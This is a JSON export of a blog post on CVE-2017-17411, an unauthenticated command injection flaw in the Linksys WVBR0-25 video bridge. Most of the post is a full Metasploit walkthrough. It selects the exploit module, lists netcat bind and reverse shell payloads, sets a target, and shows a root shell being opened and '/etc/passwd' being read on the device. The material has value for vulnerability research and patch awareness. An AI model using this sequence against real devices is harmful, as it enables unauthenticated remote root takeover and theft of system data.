{"id":3056,"date":"2017-12-26T03:19:45","date_gmt":"2017-12-26T03:19:45","guid":{"rendered":"http:\/\/www.pir8geek.com\/?p=3056"},"modified":"2017-12-26T03:19:45","modified_gmt":"2017-12-26T03:19:45","slug":"cve-2017-17411-linksys-wvbr0-25-command-injection","status":"publish","type":"post","link":"https:\/\/www.jameseduard.com\/?p=3056","title":{"rendered":"CVE-2017-17411: Linksys WVBR0 25 Command Injection"},"content":{"rendered":"<p>Recently, security researcher Ricky Lawshae from <strong>Trend Micro<\/strong><em> discovered a critical vulnerability in the Linksys Wireless Bridge WVBR0-25 that allows remote attackers to execute arbitrary code on vulnerable installations of the Linksys WVBR0-25.<\/em><\/p>\n<p>Authentication is not required to exploit this vulnerability. The specific flaw exists within the web management portal. The issue lies in the lack of proper validation of user data before executing a system call. An attacker could leverage this vulnerability to execute code with root privileges.<\/p>\n<p><strong>Getting a Root Shell on a Linksys WVBR0 25<\/strong><\/p>\n<p><iframe title=\"Getting a Root Shell on a Linksys WVBR0 25\" width=\"640\" height=\"360\" src=\"https:\/\/www.youtube.com\/embed\/3gUjBnNGLKM?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe><\/p>\n<p><strong>Exploit:<\/strong><br \/>\nexploit\/linux\/http\/linksys_wvbr0_user_agent_exec_noauth Metasploit module<\/p>\n<p>This module exploits vulnerable Linksys WVBR0-25 wireless video bridges using CVE-2017-17411. The vulnerability in question is a command injection caused by improper sanitization of the User-Agent header. The module makes an initial GET request to the root of the web server and checks the result for a vulnerable firmware version. 
If vulnerable, it makes a subsequent GET request with the User-Agent set to \u201c; #. This can be verified against WVBR0-25 devices running firmware &lt; 1.0.41.<\/p>\n<pre>msf &gt; use exploit\/linux\/http\/linksys_wvbr0_user_agent_exec_noauth \nmsf exploit(linksys_wvbr0_user_agent_exec_noauth) &gt; info\nName: Linksys WVBR0-25 User-Agent Command Execution\nModule: exploit\/linux\/http\/linksys_wvbr0_user_agent_exec_noauth\nPlatform: Unix\nPrivileged: Yes\nLicense: Metasploit Framework License (BSD)\nRank: Normal\nDisclosed: 2017-12-13\nProvided by:\nHeadlessZeke\nAvailable targets:\nId  Name\n--  ----\n0   Automatic\nBasic options:\nName     Current Setting  Required  Description\n----     ---------------  --------  -----------\nProxies                   no        A proxy chain of format type:host:port[,type:host:port][...]\nRHOST                     yes       The target address\nRPORT    80               yes       The target port\nSSL      false            no        Negotiate SSL\/TLS for outgoing connections\nVHOST                     no        HTTP server virtual host\nPayload information:\nSpace: 1024\nDescription:\nThe Linksys WVBR0-25 Wireless Video Bridge, used by DirecTV to \nconnect wireless Genie cable boxes to the Genie DVR, is vulnerable \nto OS command injection in version &lt; 1.0.41 of the web management portal via the User-Agent header. Authentication is not required to exploit this vulnerability. 
References: http:\/\/cvedetails.com\/cve\/2017-17411\/ http:\/\/www.zerodayinitiative.com\/advisories\/ZDI-17-973 https:\/\/www.thezdi.com\/blog\/2017\/12\/13\/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair msf exploit(linksys_wvbr0_user_agent_exec_noauth) &gt; show payloads \nCompatible Payloads\n===================\nName                     Disclosure Date  Rank    Description\n----                     ---------------  ----    -----------\ncmd\/unix\/bind_netcat                      normal  Unix Command Shell, Bind TCP (via netcat)\ncmd\/unix\/generic                          normal  Unix Command, Generic Command Execution\ncmd\/unix\/reverse_netcat                   normal  Unix Command Shell, Reverse TCP (via netcat)\nmsf exploit(linksys_wvbr0_user_agent_exec_noauth) &gt; set payload cmd\/unix\/bind_netcat \npayload =&gt; cmd\/unix\/bind_netcat\nmsf exploit(linksys_wvbr0_user_agent_exec_noauth) &gt; set RHOST 10.0.0.104\nRHOST =&gt; 10.0.0.104\nmsf exploit(linksys_wvbr0_user_agent_exec_noauth) &gt; exploit\n[*] 10.0.0.104:80 - Trying to access the device ...\n[*] Started bind handler\n[*] 10.0.0.104:80 - Exploiting...\n[*] Command shell session 1 opened (10.0.0.109:40541 -&gt; 10.0.0.104:4444) at 2017-12-21 17:09:54 -0600\nid\nuid=0(root) gid=0(root)\n^C\nAbort session 1? [y\/N]  y\n[*] 10.0.0.104 - Command shell session 1 closed.  
Reason: User exit\nmsf exploit(linksys_wvbr0_user_agent_exec_noauth) &gt; set payload cmd\/unix\/generic \npayload =&gt; cmd\/unix\/generic\nmsf exploit(linksys_wvbr0_user_agent_exec_noauth) &gt; set cmd cat \/etc\/passwd\ncmd =&gt; cat \/etc\/passwd\nmsf exploit(linksys_wvbr0_user_agent_exec_noauth) &gt; exploit\n[*] 10.0.0.104:80 - Trying to access the device ...\n[*] 10.0.0.104:80 - Exploiting...\n[+] 10.0.0.104:80 - Command sent successfully\n[*] 10.0.0.104:80 - Command output:  root:x:0:0::\/:\/bin\/sh nobody:x:99:99:Nobody:\/:\/bin\/nologin sshd:x:22:22::\/var\/empty:\/sbin\/nologin admin:x:1000:1000:Admin User:\/tmp\/home\/admin:\/bin\/sh quagga:x:1001:1001:Quagga\n[*] Exploit completed, but no session was created.\nmsf exploit(linksys_wvbr0_user_agent_exec_noauth) &gt;\n<\/pre>\n<p>References:<\/p>\n<ul>\n<li><a href=\"http:\/\/zerodayinitiative.com\/advisories\/ZDI-17-973\/\" target=\"_blank\" rel=\"nofollow external noopener noreferrer\" data-wpel-link=\"external\">http:\/\/zerodayinitiative.com\/advisories\/ZDI-17-973\/<\/a><\/li>\n<li><a href=\"http:\/\/www.cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-17411\" target=\"_blank\" rel=\"nofollow external noopener noreferrer\" data-wpel-link=\"external\">http:\/\/www.cve.mitre.org<\/a><\/li>\n<li><a href=\"https:\/\/github.com\/rapid7\/metasploit-framework\/pull\/9336\" target=\"_blank\" rel=\"nofollow external noopener noreferrer\" data-wpel-link=\"external\">https:\/\/github.com\/rapid7\/metasploit-framework\/pull\/9336<\/a><\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>Recently, security researcher Ricky Lawshae from Trend Micro discovered a critical vulnerability in the Linksys Wireless Bridge WVBR0-25 that allows remote attackers to execute arbitrary code on vulnerable installations of the Linksys WVBR0-25. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web management portal. 
The issue lies in the<\/p>\n","protected":false},"author":1,"featured_media":3060,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[638,688,431,615],"tags":[735,736,737,738],"class_list":["post-3056","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-router-exploitation","category-shellsploit","category-vulnerability-analysis","category-vulnerability-scanner","tag-linksys","tag-root","tag-vulnerability","tag-wvbr0"],"_links":{"self":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/posts\/3056","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3056"}],"version-history":[{"count":0,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/posts\/3056\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3056"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3056"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3056"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}